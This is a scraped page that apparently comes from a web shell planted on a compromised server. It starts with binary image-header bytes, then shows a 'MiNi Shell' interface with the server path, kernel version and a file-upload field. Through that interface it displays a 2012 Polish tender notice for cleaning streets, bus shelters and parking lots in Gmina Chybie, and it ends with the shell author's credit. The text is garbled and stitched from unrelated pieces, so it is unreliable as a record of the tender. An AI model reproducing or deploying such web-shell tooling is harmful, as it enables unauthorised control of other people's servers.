JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120220/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120220/49788-N-2012.html

<p class="kh_header"><b>Chybie: Utrzymanie czystości i porządku na terenie Gminy Chybie w 2012 roku</b><br>
<b>Numer ogłoszenia: 49788 - 2012; data zamieszczenia: 20.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chybie - Wójt Gminy Chybie , ul. Bielska 78, 43-520 Chybie, woj. śląskie, tel. 33 856 10 96, faks 33 8561096, 8522636.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chybie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości i porządku na terenie Gminy Chybie w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie porządku i czystości na terenie Gminy Chybie w 2012 r.

Utrzymywanie porządku i czystości na terenie Gminy Chybie w okresie od dnia podpisania umowy do 31 grudnia 2012 r. polegać będzie na usuwaniu śmieci   i chwastów oraz zamiataniu chodnika i jezdni przy krawężniku dwa razy            w miesiącu na następujących ulicach:
-	parking przed i za Ośrodkiem Zdrowia w Chybiu, 
-	ul. Dworcowa do targowiska w Chybiu,
-  dwa parkingi za Urzędem Gminy i droga dojazdowa do bramy Szkoły Podstawowej w Chybiu,
-	ul. Lipowa wraz z parkingiem koło Domu Przedpogrzebowego oraz pas żwirowy wzdłuż ogrodzenia boiska w Chybiu,
-	ul. Kopernika w Mnichu na odcinku od skrzyżowania ul. Cieszyńskiej do Szkoły Podstawowej w Mnichu wraz z chodnikiem wzdłuż Szkoły,
-	ul. Karola Miarki w Zaborzu na odcinku od Szkoły Podstawowej do ul. Czereśniowej wraz z chodnikiem wzdłuż Szkoły i parkingiem,
-	ul. Bielska i Wyzwolenia wzdłuż płotu przy Kościele wraz z chodnikiem. 

Ponadto:
-	systematyczne opróżnianie kubłów na śmieci z terenów należących do gminy (parkingi, kubły przy drogach), co najmniej 4 razy w miesiącu wraz z segregacją śmieci.
-	utrzymanie wiat przystankowych w ilości 13 szt. w stanie czystości, poprzez co najmniej 4 krotne mycie w ciągu roku, systematyczne opróżnianie kubłów co najmniej 4 razy w miesiącu, 
-	co najmniej 2 krotny oprysk traw na całości chodników w gminie Chybie (chodniki przy drogach powiatowych 3.648,5 m, chodniki przy drogach gminnych 949 m), na parkingach objętych pracami porządkowymi oraz pasa żwirowego przy ul. Lipowej,
-	oczyszczanie studzienek przy ul. Kopernika w Mnichu i Lipowej w Chybiu oraz kratek ściekowych na parkingu przy ul. Lipowej gwarantujące ich stałą drożność, nie mniej niż  2 krotnie,
-	umycie jednokrotne na wiosnę barierek ochronnych wzdłuż ul. Kopernika (Szkoła Podstawowa i Gimnazjum w Mnichu), ul. Miarki (przed Szkołą Podstawową w Zaborzu), wzdłuż chodnika przy ul. Bielskiej i na skrzyżowaniach tej ulicy z ul. Lipową, Wyzwolenia, Cieszyńską. 

Należy przedstawić harmonogram prac planowanych do prowadzenia                 w poszczególnych miesiącach.

Miejsce lokalizacji wiat przystankowych i kubłów
1)	przy ul. Bielskiej - 5 szt.: 
-	na skrzyżowaniu z ul. Kolonia,
-	przy Kościele w Chybiu,
-	przy parku w centrum Chybia,
-	przy Przedszkolu w Chybiu,
-	przy Barze na Żabińcu  

2)	przy ul. Wyzwolenia- 4 szt.: 
-	przy Kościele w Chybiu,
-	na wprost sklepu BO-HEN 
-	obok sklepu Nr 14 w Chybiu
-	na ul. Podgroble 

3)	przy ul. Cieszyńskiej - 3 szt. :
-	za skrzyżowaniem z ul. Kopernika,
-	przy Firmie AGROMET 
-	przy sklepie i stawach PAN Gołysz

4)	przy ul. Miarki - 1 szt.

Wykaz dróg przy których zlokalizowane są zielono-żółte kubły:
1)	ul. Bielska 
2)	ul. Lipowa i skrzyżowanie z ul. Sportową oraz przed Domem Przedpogrzebowym 
3)	ul. Kopernika
4)	ul. Cieszyńska
5)	ul. Miarki oraz znajdujący się przy tej ul. parking koło Kościoła w Zaborzu 

Dodatkowo kubły:
-	przy Urzędzie Gminy,
-	przy parkingu za Urzędem Gminy i parkingu w Zaborzu przy ul. K. Miarki,
Powierzchnia parkingów:
- za Ośrodkiem Zdrowia - 1807 m2
- za Urzędem Gminy - 105 m2
- przy Kościele - 383,4 m2
- przy ul. Miarki - 332,93 m2
- przy Domu Przedpogrzebowym - 1033 m2
ŁĄCZNIE: 3661 m2

Długość poboczy dróg wzdłuż chodników:
- ul. Dworcowa - 210 m (z asfaltu)
- ul. Lipowa - 270 m
- ul. Miarki - 110 m
- ul. Kopernika - 359 m
ŁĄCZNIE:  949 m  

Wykonawca zobowiązany będzie do udokumentowania sposobu zagospodarowania odpadów powstałych w związku z wykonywaniem zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 90.64.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstąpił od żądania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania niezbędnej wiedzy i doświadczenia zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat (licząc od dnia wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał z należytą starannością co najmniej jedną usługę polegającą na utrzymaniu czystości, podobną do przedmiotu zamówienia, tj. opróżnianie kubłów na śmieci, zamiatanie itp., wykonywaną przez okres co najmniej 3 miesięcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. dokument pełnomocnictwa do reprezentowania wykonawców wspólnie składających ofertę        w postępowaniu o udzielenie zamówienia (jeżeli ofertę składa np. konsorcjum);                           w przypadku spółki cywilnej sposób reprezentacji może wynikać z umowy spółki; 
2. harmonogram prac planowanych do prowadzenia w poszczególnych miesiącach -                wg załącznika nr 5 do siwz, który będzie stanowił załącznik do umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewidywane zmiany umowy zawarte w § 10 projektu umowy:
1.	Zmiany umowy możliwe są jedynie w trybie art. 144 ustawy Prawo zamówień publicznych. 
2.	Zmiana postanowień niniejszej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.
3.	 W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian umowy za  zgodą Zamawiającego.
4.	 Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez  Wykonawcę.
5.	 Zmiany umowy nie mogą wykraczać poza zakres świadczenia określony w SIWZ.
6.	 Zmiany, o których mowa w ust. 3, mogą dotyczyć:
a)	zmiany sposobu rozliczania umowy lub dokonywania płatności częściowych na rzecz Wykonawcy,
b)	zmiany terminów określonych w harmonogramie, z przyczyn niezależnych od Wykonawcy, w szczególności spowodowanych warunkami atmosferycznymi, różnego rodzaju klęskami żywiołowymi, epidemiami, operacjami wojennymi, strajkiem generalnym, wstrzymaniem prac przez Zamawiającego albo przerw w wykonywaniu prac, powstałych z przyczyn leżących po stronie Zamawiającego,
c)	zmiany obowiązującej ustawowej stawki VAT.
7.	Warunkiem dokonania zmian, o których mowa w ust. 6, jest złożenie wniosku przez stronę inicjującą zmianę umowy zawierającego:
1)	opis propozycji zmiany,
2)	uzasadnienie zmiany,
3)	obliczenie kosztów zmiany, jeżeli zmiana będzie miała wpływ na wynagrodzenie wykonawcy.
8.	Wykonawca nie będzie uprawniony do inicjowania zmiany umowy, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę; w takim przypadku koszty dodatkowe związane z takimi zmianami ponosi Wykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chybie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Chybiu, 43-520 Chybie ul. Bielska 78, pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2012 godzina 09:00, miejsce: Urząd Gminy w Chybiu, 43-520 Chybie ul. Bielska 78, pok. nr 2 (biuro obsługi klienta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com